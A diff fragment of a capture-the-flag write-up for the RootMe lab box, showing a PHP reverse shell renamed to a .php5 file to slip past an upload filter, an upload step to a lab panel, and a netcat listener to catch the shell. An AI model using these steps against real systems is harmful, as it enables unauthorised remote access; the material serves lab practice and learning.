akshayrkapadia/CTF/RootMeBox/RootMeBox.md

 mv php-reverse-shell.php payload.php5
 ```

-Change IP address to your IP address and upload file
+Change IP address to your IP address and upload file to http://10.10.142.72/panel

 ```
 nc -nlvp 4444